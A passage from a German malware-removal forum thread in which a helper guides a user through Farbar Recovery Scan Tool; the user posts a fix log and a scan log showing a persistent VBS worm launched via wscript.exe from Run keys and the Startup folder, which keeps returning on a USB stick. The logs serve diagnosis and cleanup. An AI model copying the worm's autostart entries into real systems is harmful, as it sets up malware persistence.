Speichere diese bitte als Fixlist.txt auf deinem Desktop (oder dem Verzeichnis in dem sich FRST befindet).
  • Starte nun FRST erneut und klicke den Entfernen Button.
  • Das Tool erstellt eine Fixlog.txt.
  • Poste mir deren Inhalt.


fxak 18.04.2014 22:27

Habe alles gemacht, die .vbs kommt nach formatieren weiterhin auf dem Stick

Fixlog.txt:
Code:

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 17-04-2014 01
Ran by Franz at 2014-04-18 23:14:09 Run:1
Running from C:\Users\Franz\Desktop
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
HKLM\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" <===== ATTENTION
HKLM-x32\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs"
HKU\S-1-5-21-2199740673-3875191607-274323708-1001\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" <===== ATTENTION
Startup: C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs ()
2014-04-01 04:51 - 2013-09-22 17:47 - 00073266 _____ () C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs
       
*****************

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\wtbchkxbde => Value deleted successfully.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\wtbchkxbde => Value deleted successfully.
HKU\S-1-5-21-2199740673-3875191607-274323708-1001\Software\Microsoft\Windows\CurrentVersion\Run\\wtbchkxbde => Value deleted successfully.
C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs => Moved successfully.
Could not move "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" => Scheduled to move on reboot.

=> Result of Scheduled Files to move (Boot Mode: Normal) (Date&Time: 2014-04-18 23:16:01)<=

C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs => Is moved successfully.

==== End of Fixlog ====


schrauber 19.04.2014 12:38

Frisches FRST log bitte.

fxak 20.04.2014 04:23

FRST.txt:


FRST Logfile:
Code:

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 17-04-2014 01
Ran by Franz (administrator) on FRANZ-PC on 20-04-2014 05:20:46
Running from C:\Users\Franz\Desktop
Windows 7 Home Premium (X64) OS Language: German Standard
Internet Explorer Version 9
Boot Mode: Normal


==================== Processes (Whitelisted) =================

(AMD) C:\Windows\system32\atiesrxx.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe
(AMD) C:\Windows\system32\atieclxx.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\adminservice.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\dsiwmis.exe
(Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Locktime Software) C:\Program Files\NetLimiter 3\nlsvc.exe
(NewTech Infosystems, Inc.) C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe
(Acer Incorporated) C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe
(Acer Group) C:\Program Files\Acer\Acer Updater\UpdaterService.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avshadow.exe
(Alcor Micro Corp.) C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apoint.exe
(Locktime Software) C:\Program Files\NetLimiter 3\NLClientApp.exe
(Acer Incorporated) C:\Program Files (x86)\Acer\Acer VCM\AcerVCM.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApMsgFwd.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apntex.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\HidFind.exe
(NewTech Infosystems, Inc.) C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\LManager.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe
(Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(Microsoft Corporation) C:\Windows\System32\wscript.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\MMDx64Fx.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\LMworker.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerTray.exe
(Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerEvent.exe
(Intel Corporation) C:\Windows\system32\igfxext.exe
(Intel Corporation) C:\Windows\system32\igfxsrvc.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\distnoted.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServer.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
(Panda Security) C:\Program Files (x86)\Panda USB Vaccine\USBVaccine.exe


==================== Registry (Whitelisted) ==================

HKLM\...\Run: [AmIcoSinglun64] => C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe [323584 2009-09-23] (Alcor Micro Corp.)
HKLM\...\Run: [mwlDaemon] => C:\Program Files (x86)\EgisTec MyWinLocker\x86\mwlDaemon.exe
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [9996320 2010-01-20] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [877600 2010-01-20] (Realtek Semiconductor)
HKLM\...\Run: [AtherosBtStack] => C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe [585376 2010-05-25] (Atheros Commnucations)
HKLM\...\Run: [AthBtTray] => C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe [354464 2010-05-25] (Atheros Commnucations)
HKLM\...\Run: [Apoint] => C:\Program Files\Apoint2K\Apoint.exe [345648 2010-03-09] (Alps Electric Co., Ltd.)
HKLM\...\Run: [Acer ePower Management] => C:\Program Files\Acer\Acer PowerSmart Manager\ePowerTrayLauncher.exe [496160 2010-02-02] (Acer Incorporated)
HKLM\...\Run: [BCSSync] => C:\Program Files\Microsoft Office\Office14\BCSSync.exe [108144 2012-11-05] (Microsoft Corporation)
HKLM\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" <===== ATTENTION
HKLM-x32\...\Run: [BackupManagerTray] => C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe [260608 2010-03-09] (NewTech Infosystems, Inc.)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [98304 2010-04-21] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [LManager] => C:\Program Files (x86)\Launch Manager\LManager.exe [960080 2010-05-26] (Dritek System Inc.)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [43848 2014-02-12] (Apple Inc.)
HKLM-x32\...\Run: [avgnt] => C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe [689744 2014-02-20] (Avira Operations GmbH & Co. KG)
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [49208 2011-10-28] (Hewlett-Packard)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-02-21] (Apple Inc.)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-2199740673-3875191607-274323708-1001\...\Run: [NetLimiter] => C:\Program Files\NetLimiter 3\NLClientApp.exe [2910208 2011-03-21] (Locktime Software)
HKU\S-1-5-21-2199740673-3875191607-274323708-1001\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" <===== ATTENTION
Startup: C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs ()

==================== Internet (Whitelisted) ====================

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com.ph/intl/en/
HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
SearchScopes: HKLM-x32 - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACAW
SearchScopes: HKCU - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACAW_deDE532
BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Office Document Cache Handler - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Adobe PDF Link Helper - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - c:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO-x32: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO-x32: Microsoft-Konto-Anmelde-Hilfsprogramm - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Office Document Cache Handler - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)

FireFox:
========
FF Plugin: @microsoft.com/GENUINE - disabled No File
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 - C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=2.0.6 - C:\Program Files\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @microsoft.com/GENUINE - disabled No File
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 - C:\PROGRA~2\MICROS~4\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 - C:\PROGRA~2\MICROS~4\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3508.0205 - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 - C:\Program Files (x86)\Google\Update\1.3.23.9\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 - C:\Program Files (x86)\Google\Update\1.3.23.9\npGoogleUpdate3.dll (Google Inc.)

Chrome:
=======
CHR Plugin: (Shockwave Flash) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\PepperFlash\11.7.700.202\pepflashplayer.dll No File
CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\ppGoogleNaClPluginChrome.dll ()
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\pdf.dll ()
CHR Plugin: (Adobe Acrobat) - c:\Program Files (x86)\Adobe\Reader 9.0\Reader\Browser\nppdf32.dll (Adobe Systems Inc.)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~4\Office14\NPAUTHZ.DLL (Microsoft Corporation)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~4\Office14\NPSPWRAP.DLL (Microsoft Corporation)
CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.135\npGoogleUpdate3.dll No File
CHR Plugin: (iTunes Application Detector) - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
CHR Extension: (Google Docs) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2013-05-15]
CHR Extension: (Google Drive) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-05-15]
CHR Extension: (YouTube) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2013-05-15]
CHR Extension: (Google-Suche) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2013-05-15]
CHR Extension: (Google Wallet) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-09-10]

==================== Services (Whitelisted) =================

R2 AntiVirSchedulerService; C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe [440400 2014-02-20] (Avira Operations GmbH & Co. KG)
R2 AntiVirService; C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe [440400 2014-02-20] (Avira Operations GmbH & Co. KG)
R2 ePowerSvc; C:\Program Files\Acer\Acer PowerSmart Manager\ePowerSvc.exe [820768 2010-02-02] (Acer Incorporated)
R2 nlsvc; C:\Program Files\NetLimiter 3\nlsvc.exe [1845248 2011-03-21] (Locktime Software)
R2 RS_Service; C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe [260640 2010-01-29] (Acer Incorporated)

==================== Drivers (Whitelisted) ====================

U5 AppMgmt; C:\Windows\system32\svchost.exe [27136 2009-07-14] (Microsoft Corporation)
R2 avgntflt; C:\Windows\System32\DRIVERS\avgntflt.sys [108440 2013-12-22] (Avira Operations GmbH & Co. KG)
R1 avipbb; C:\Windows\System32\DRIVERS\avipbb.sys [131576 2013-12-22] (Avira Operations GmbH & Co. KG)
R1 avkmgr; C:\Windows\System32\DRIVERS\avkmgr.sys [28600 2013-12-15] (Avira Operations GmbH & Co. KG)
R1 nltdi; C:\Program Files\NetLimiter 3\nltdi.sys [88200 2011-03-21] (Locktime Software)
S3 catchme; \??\C:\ComboFix\catchme.sys [X]

==================== NetSvcs (Whitelisted) ===================


==================== One Month Created Files and Folders ========

2014-04-20 05:20 - 2014-04-20 05:20 - 00015472 _____ () C:\Users\Franz\Desktop\FRST.txt
2014-04-18 23:16 - 2013-09-22 17:47 - 00073266 _____ () C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs
2014-04-18 23:13 - 2014-04-18 23:13 - 00000000 ____D () C:\Users\Franz\Desktop\FRST-OlderVersion
2014-04-16 23:57 - 2014-04-16 23:59 - 00000041 _____ () C:\Users\Franz\Desktop\pw.txt
2014-04-16 23:46 - 2014-04-16 23:46 - 00000000 ____D () C:\Windows\ERUNT
2014-04-16 23:07 - 2014-04-16 23:10 - 00119512 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-04-16 23:06 - 2014-04-16 23:06 - 00001106 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-04-16 23:06 - 2014-04-16 23:06 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-04-16 23:06 - 2014-04-16 23:06 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-04-16 23:06 - 2014-04-03 09:51 - 00088280 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-04-16 23:06 - 2014-04-03 09:51 - 00063192 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-04-16 23:06 - 2014-04-03 09:50 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-04-16 02:56 - 2014-04-16 03:44 - 00000000 ____D () C:\Qoobox
2014-04-16 02:56 - 2014-04-16 03:35 - 00000000 ____D () C:\Windows\erdnt
2014-04-16 02:56 - 2011-06-26 08:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-04-16 02:56 - 2010-11-07 19:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-04-16 02:56 - 2009-04-20 06:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-04-16 02:56 - 2000-08-31 02:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-04-16 02:56 - 2000-08-31 02:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-04-16 02:56 - 2000-08-31 02:00 - 00098816 _____ () C:\Windows\sed.exe
2014-04-16 02:56 - 2000-08-31 02:00 - 00080412 _____ () C:\Windows\grep.exe
2014-04-16 02:56 - 2000-08-31 02:00 - 00068096 _____ () C:\Windows\zip.exe
2014-04-16 02:52 - 2014-04-16 02:52 - 00000000 ____D () C:\ProgramData\Panda Security
2014-04-16 02:52 - 2014-04-16 02:52 - 00000000 ____D () C:\Program Files (x86)\Panda USB Vaccine
2014-04-16 02:50 - 2014-04-16 02:50 - 00003072 _____ () C:\Windows\System32\Tasks\PandaUSBVaccine
2014-04-16 02:47 - 2014-04-16 02:48 - 05194807 ____R (Swearware) C:\Users\Franz\Desktop\ComboFix.exe
2014-04-14 11:21 - 2008-03-22 04:21 - 733980672 ___SH () C:\Users\Franz\Desktop\The Seeker-The Dark is Rising[2007]DvDrip[Eng]-FXG.avi
2014-04-14 11:19 - 2012-11-07 09:32 - 247528059 ___SH () C:\Users\Franz\Desktop\Amityville Horror 2 The Possession (Full Movie) - YouTube.flv
2014-04-14 11:19 - 2010-01-05 16:04 - 956607690 ___SH () C:\Users\Franz\Desktop\The Marine 2 (2010) DVDR DivXNL-Team.avi
2014-04-14 10:43 - 2014-04-20 05:20 - 00000000 ____D () C:\FRST
2014-04-14 10:40 - 2014-04-18 23:13 - 02158592 _____ (Farbar) C:\Users\Franz\Desktop\FRST64.exe
2014-04-11 05:39 - 2014-03-04 14:07 - 142602520 _____ (Microsoft Corporation) C:\Users\Franz\Desktop\wlsetup-all_16.4.3508.0205.exe
2014-04-07 09:32 - 2014-04-09 10:19 - 00000000 ____D () C:\[Smad-Cage]
2014-04-07 09:30 - 2014-04-07 09:30 - 00000000 ____D () C:\ProgramData\Kaspersky Lab Setup Files
2014-04-03 10:10 - 2014-04-12 01:15 - 00000000 ____D () C:\Users\Franz\Desktop\FPCD
2014-04-02 08:42 - 2014-04-16 22:12 - 00000000 ____D () C:\Users\Franz\Desktop\Antivir
2014-04-02 08:27 - 2014-04-02 08:27 - 00000000 ____D () C:\Windows\pss
2014-04-02 08:19 - 2014-04-02 08:54 - 00000000 ____D () C:\Users\Franz\AppData\Local\NPE
2014-04-02 08:19 - 2014-04-02 08:19 - 00000000 ____D () C:\ProgramData\Norton
2014-04-02 06:29 - 2013-02-01 10:07 - 557660892 _____ () C:\Users\Franz\Desktop\Bavaria Traumreise durch Bayern.mkv
2014-04-02 06:15 - 2013-03-03 06:17 - 3702646581 _____ () C:\Users\Franz\Desktop\Das grüne Wunder - Unser Wald.mkv
2014-03-25 09:41 - 2014-03-25 09:41 - 00003416 ____N () C:\bootsqm.dat
2014-03-25 09:40 - 2014-03-25 09:40 - 00000000 ____D () C:\found.001
2014-03-21 07:44 - 2014-03-24 01:36 - 00000000 ____D () C:\Users\Franz\AppData\Local\Microsoft Games

==================== One Month Modified Files and Folders =======

2014-04-20 05:21 - 2014-04-20 05:20 - 00015472 _____ () C:\Users\Franz\Desktop\FRST.txt
2014-04-20 05:20 - 2014-04-14 10:43 - 00000000 ____D () C:\FRST
2014-04-20 05:20 - 2013-04-16 20:29 - 00000043 _____ () C:\Users\Public\Documents\AtherosServiceConfig.ini
2014-04-20 04:51 - 2013-04-16 19:13 - 01757146 _____ () C:\Windows\WindowsUpdate.log
2014-04-20 04:46 - 2013-04-17 05:01 - 00696870 _____ () C:\Windows\system32\perfh007.dat
2014-04-20 04:46 - 2013-04-17 05:01 - 00148134 _____ () C:\Windows\system32\perfc007.dat
2014-04-20 04:46 - 2009-07-14 07:13 - 01612484 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-04-20 04:42 - 2013-04-16 20:09 - 00001108 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-04-20 04:41 - 2009-07-14 06:51 - 00088960 _____ () C:\Windows\setupact.log
2014-04-19 03:21 - 2013-04-16 20:22 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\vlc
2014-04-18 23:23 - 2009-07-14 06:45 - 00022672 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-04-18 23:23 - 2009-07-14 06:45 - 00022672 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-04-18 23:16 - 2013-04-16 20:09 - 00001104 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-04-18 23:15 - 2010-05-11 01:15 - 00114178 _____ () C:\Windows\PFRO.log
2014-04-18 23:15 - 2009-07-14 07:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-04-18 23:14 - 2013-04-16 19:54 - 00000000 ___RD () C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
2014-04-18 23:13 - 2014-04-18 23:13 - 00000000 ____D () C:\Users\Franz\Desktop\FRST-OlderVersion
2014-04-18 23:13 - 2014-04-14 10:40 - 02158592 _____ (Farbar) C:\Users\Franz\Desktop\FRST64.exe
2014-04-17 00:00 - 2014-03-11 17:56 - 00000000 ____D () C:\AdwCleaner
2014-04-16 23:59 - 2014-04-16 23:57 - 00000041 _____ () C:\Users\Franz\Desktop\pw.txt
2014-04-16 23:46 - 2014-04-16 23:46 - 00000000 ____D () C:\Windows\ERUNT
2014-04-16 23:10 - 2014-04-16 23:07 - 00119512 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-04-16 23:06 - 2014-04-16 23:06 - 00001106 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-04-16 23:06 - 2014-04-16 23:06 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-04-16 23:06 - 2014-04-16 23:06 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-04-16 22:12 - 2014-04-02 08:42 - 00000000 ____D () C:\Users\Franz\Desktop\Antivir
2014-04-16 03:44 - 2014-04-16 02:56 - 00000000 ____D () C:\Qoobox
2014-04-16 03:43 - 2009-07-14 05:20 - 00000000 __RHD () C:\Users\Default
2014-04-16 03:35 - 2014-04-16 02:56 - 00000000 ____D () C:\Windows\erdnt
2014-04-16 03:15 - 2009-07-14 04:34 - 00000215 _____ () C:\Windows\system.ini
2014-04-16 02:52 - 2014-04-16 02:52 - 00000000 ____D () C:\ProgramData\Panda Security
2014-04-16 02:52 - 2014-04-16 02:52 - 00000000 ____D () C:\Program Files (x86)\Panda USB Vaccine
2014-04-16 02:50 - 2014-04-16 02:50 - 00003072 _____ () C:\Windows\System32\Tasks\PandaUSBVaccine
2014-04-16 02:48 - 2014-04-16 02:47 - 05194807 ____R (Swearware) C:\Users\Franz\Desktop\ComboFix.exe
2014-04-14 10:20 - 2013-04-16 21:29 - 00000000 ____D () C:\Setups
2014-04-12 01:15 - 2014-04-03 10:10 - 00000000 ____D () C:\Users\Franz\Desktop\FPCD
2014-04-09 10:19 - 2014-04-07 09:32 - 00000000 ____D () C:\[Smad-Cage]
2014-04-07 09:30 - 2014-04-07 09:30 - 00000000 ____D () C:\ProgramData\Kaspersky Lab Setup Files
2014-04-06 08:23 - 2013-04-16 20:09 - 00004104 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-04-06 08:23 - 2013-04-16 20:09 - 00003852 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-04-03 09:51 - 2014-04-16 23:06 - 00088280 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-04-03 09:51 - 2014-04-16 23:06 - 00063192 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-04-03 09:50 - 2014-04-16 23:06 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-04-02 08:54 - 2014-04-02 08:19 - 00000000 ____D () C:\Users\Franz\AppData\Local\NPE
2014-04-02 08:27 - 2014-04-02 08:27 - 00000000 ____D () C:\Windows\pss
2014-04-02 08:25 - 2013-04-16 20:39 - 00000000 ___RD () C:\Users\Franz\Desktop\Dropbox
2014-04-02 08:24 - 2013-04-16 20:35 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\Dropbox
2014-04-02 08:19 - 2014-04-02 08:19 - 00000000 ____D () C:\ProgramData\Norton
2014-04-02 08:03 - 2013-04-16 20:10 - 00002179 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-03-31 04:12 - 2014-02-28 13:54 - 00000000 ____D () C:\Users\Franz\Desktop\Fotos
